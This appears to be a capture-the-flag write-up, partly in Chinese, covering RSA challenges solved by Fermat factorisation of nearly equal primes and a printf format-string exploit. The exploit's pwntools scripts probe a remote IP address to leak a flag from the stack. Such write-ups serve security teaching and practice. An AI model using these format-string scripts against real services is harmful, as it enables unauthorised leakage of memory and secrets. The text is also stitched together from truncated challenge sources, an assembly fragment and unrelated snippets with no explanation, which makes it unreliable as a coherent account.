from Crypto.Util.number import * from sympy import nextprime
flag = b'REDACTED'
p = getPrime(1024) q = nextprime(p) e = 65537
n = p * q c = pow(bytes_to_long(flag), e, n)
print(f"n = {n}") print(f"c = {c}")
cipher
1 2
n = 20159884168863899177128175715030429666461733285660170664255048579116265087763268748333820860913271674586980839088092697230336179818435879126554509868570255414201418619851045615744211750178240471758695923469393333600480843090831767416937814471973060610730578620506577745372347777922355677932755542699210313287595362584505135967456855068550375989801913361017083952090117041405458626488736811460716474071561590513778196334141517893224697977911862004615690183334216587398645213023148750443295007000911541566340284156527080509545145423451091853688188705902833261507474200445477515893168405730493924172626222872760780966427 c = 18440162368010249375653348677429595229051180035668845001125855048750591059785630865891877031796050869136099359028540172514890273415892550857190509410541828375948243175466417949548148007390803680005616875833010137407850955608659023797782656930905693262770473679394796595557898347900786445803645539553815614140428316398058138450937721961593146082399553119578102712100359284788650328835784603011091312735813903241087475279011862693938914825685547337081335030237385061397899718079346063519325222861490101383929790275635381333028091769118083102339908694751574572782030287570280071809896532329742115422479473386147281509394
注意到source中获取p,q时直接使用的nextprime,即两素数相差很近
直接费马分解+RSA解密丝滑连招出flag
使用yafu进行分解:
得到p, q 正常RSA解密即可
1 2 3 4 5 6 7 8 9
from Crypto.Util.number import * p = 141985506897231941308512923885300128905042311260138568794604206121080701727914934144982091139843178794485634682609841794924046596349428012470654095827271229332196334064446305896952838867217202135745989681311949561794583125471246401285687229433924674917884710139141784537370509554520561718028000388149962362867 q = 141985506897231941308512923885300128905042311260138568794604206121080701727914934144982091139843178794485634682609841794924046596349428012470654095827271229332196334064446305896952838867217202135745989681311949561794583125471246401285687229433924674917884710139141784537370509554520561718028000388149962362681 n = 20159884168863899177128175715030429666461733285660170664255048579116265087763268748333820860913271674586980839088092697230336179818435879126554509868570255414201418619851045615744211750178240471758695923469393333600480843090831767416937814471973060610730578620506577745372347777922355677932755542699210313287595362584505135967456855068550375989801913361017083952090117041405458626488736811460716474071561590513778196334141517893224697977911862004615690183334216587398645213023148750443295007000911541566340284156527080509545145423451091853688188705902833261507474200445477515893168405730493924172626222872760780966427 c = 18440162368010249375653348677429595229051180035668845001125855048750591059785630865891877031796050869136099359028540172514890273415892550857190509410541828375948243175466417949548148007390803680005616875833010137407850955608659023797782656930905693262770473679394796595557898347900786445803645539553815614140428316398058138450937721961593146082399553119578102712100359284788650328835784603011091312735813903241087475279011862693938914825685547337081335030237385061397899718079346063519325222861490101383929790275635381333028091769118083102339908694751574572782030287570280071809896532329742115422479473386147281509394 e = 65537 phi = (p-1)*(q-1) d = inverse(e, phi) print(long_to_bytes(pow(c, d, n)))
OSCTF{m4y_7h3_pR1m3_10v3_34cH_07h3r?}
Efficient RSA
难度:热身
chall.py
1 2 3 4 5 6 7 8 9 10 11 12
from Cryptodome.Util.number import getPrime, bytes_to_long
Flag = bytes_to_long(b"REDACTED")
p = getPrime(112) q = getPrime(112) n = p*q e = 65537
from Crypto.Util.number import * p = 3058290486427196148217508840815579 q = 4289583456856434512648292419762447 n = 13118792276839518668140934709605545144220967849048660605948916761813 c = 8124539402402728939748410245171419973083725701687225219471449051618 e = 65537 phi = (p-1)*(q-1) d = inverse(e, phi) print(long_to_bytes(pow(c, d, n)))
def encrypt(billet_doux): letter = '' for heart in range(len(billet_doux)): letters = billet_doux[heart] if not letters.isalpha(): owo = letters else: uwu = to_my_honey(letters) owo = from_your_lover(uwu + heart) letter += owo return letter
from Crypto.Util.number import * from secret import flag,a,v2,pi
z1 = a+flag y = long_to_bytes(z1) print("The message is",y) s = '' s += chr(ord('a')+23) v = ord(s) f = 5483762481^v g = f*35
r = 14 l = g surface_area= pi*r*l w = surface_area//1 s = int(f) v = s^34 for i in range(1,10,1): h = v2*30 h ^= 34 h *= pi h /= 4567234567342 a += g+v2+f a *= 67 al=a print("a1:",al) print('h:',h)
#The message is b'\x0c\x07\x9e\x8e/\xc2' #a1 is: 899433952965498 #h is: 0.0028203971921452278
section .data fmt: db "%ld",0 output: db "Correct",10,0 out: db "Not Correct",10,0 inp1: db "Input 1st number:",0 inp2: db "Input 2nd number:",0 inp3: db "Input 3rd number:",0
section .text global main main: push ebp mov ebp,esp sub esp,0x20 push inp1 call printf lea eax,[ebp-0x4] push eax push fmt call scanf
readflag(v2, 64); printf("Tell me your secret so I can reveal mine ;) >> "); __isoc99_scanf("%127s", v1); puts("Here's your secret.. I ain't telling mine :p"); printf(v1); return putchar(10); }
通过编写暴力破解脚本,我们可以找到flag在堆栈中的位置。
标志位置查找器
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
from pwn import * flag="" for i in range(1,100): payload="%"+str(i)+"$p" io=remote("34.125.199.248", 1337) io.recvuntil('>>') io.sendline(payload) io.recvline() back=io.recvline().split("\n") if back[0]=="(nil)": continue back=back[0].split("0x")[1] if len(back)%2!=0: back="0"+back print back.decode("hex")[::-1] #36 45
利用脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
from pwn import * flag="" for i in range(36,45): payload="%"+str(i)+"$p" io=remote("34.125.199.248", 1337) io.recvuntil('>>') io.sendline(payload) io.recvline()
back=io.recvline().split("\n") if back[0]=="(nil)": continue back=back[0].split("0x")[1] if len(back)%2!=0: back="0"+back flag+=back.decode("hex")[::-1] print flag
Working in a coal mine is dangerous stuff. Good thing I've got my bird to protect me. Let's give it a name. ... How many letters should its name have? > 33 And what's the name? > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Ok... its name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA NECGLSPQ